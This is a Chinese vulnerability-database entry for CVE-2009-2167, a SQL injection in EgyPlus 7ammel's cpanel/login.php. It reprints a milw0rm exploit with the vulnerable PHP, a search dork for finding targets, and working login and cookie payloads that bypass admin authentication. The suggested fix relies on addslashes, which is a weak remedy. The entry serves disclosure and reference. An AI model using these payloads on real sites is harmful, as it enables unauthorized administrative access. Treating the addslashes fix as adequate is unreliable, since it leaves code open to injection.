EgyPlus 7ammel "cpanel/login.php" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117901 漏洞类型 SQL注入
发布时间 2009-06-03 更新时间 2009-06-25
CVE编号 CVE-2009-2167 CNNVD-ID CNNVD-200906-362
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8865
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-362
|漏洞详情
EgyPlus7ammel(又称7ml)1.0.1及其早期版本的cpanel/login.php中存在多个SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助(1)用户名或(2)密码参数,执行任意SQL指令。
|漏洞EXP
||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
          (  :  /    (_)    /           (      .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait, PEACE...

=Vuln:		EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)
=INFO:		http://egyplus.org/article-2.htm
=Download:  	http://traidnt.net/vb/attachment.php?attachmentid=252224&d=1211197439
=DORK:  	"Powered By EgyPlus"

                             _-=/:Conditions:\=-_
---------------------------------------------------------------------------------
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off
--------------------------------------=_=---------------------------------------

                            _-=/:Vulnerable_Code:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::--

if($_COOKIE['username']){
$username = $_COOKIE['username']; <---- Not filtered
$password = $_COOKIE['password']; <---- Not filtered
}else{
$username = $_POST['username'];   <---- Not filtered
$password = $_POST['password'];   <---- Not filtered
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)  <---- Checks if MySQL statement is true then continues, FAIL...
{
---------------------------------------=_=--------------------------------------

                     _-=/:Proof-OF-Concept-or-Whatever:\=-_
---------------------------------------------------------------------------------
We have TWO ways to do this:

Login with these:

username: qabandi' or '1'='1
password: qabandi' or '1'='1


or we set cookies (longer version)
javascript:document.cookie = "username=qabandi' or '1'='1"
javascript:document.cookie = "password=qabandi' or '1'='1"
---------------------------------------=_=--------------------------------------

                            _-=/:SOLUTION:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::-- <== Change the code as following;

if($_COOKIE['username']){
$username = addslashes($_COOKIE['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_COOKIE['password']); <---- Filter with ADDSLASHES()
}else{
$username = addslashes($_POST['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_POST['password']); <---- Filter with ADDSLASHES()
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)
{
---------------------------------------=_=--------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-
-=-=-=-==Bdon-=-za3al=-=-shabab-=-=el-thaghra-=-mafe=--=Mnha=--=-faydeh-==-==-=-
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-
-==-=-=-=-==-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=---=-==-=-==-=-=-=-=-=-=--
=-=-=-=-==-=-=-=-=-=-No----More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-
Salam to All Muslim Hackers.

# milw0rm.com [2009-06-03]
|参考资料

来源:XF
名称:egyplus-login-sql-injection(50935)
链接:http://xforce.iss.net/xforce/xfdb/50935
来源:VUPEN
名称:ADV-2009-1491
链接:http://www.vupen.com/english/advisories/2009/1491
来源:MILW0RM
名称:8865
链接:http://www.milw0rm.com/exploits/8865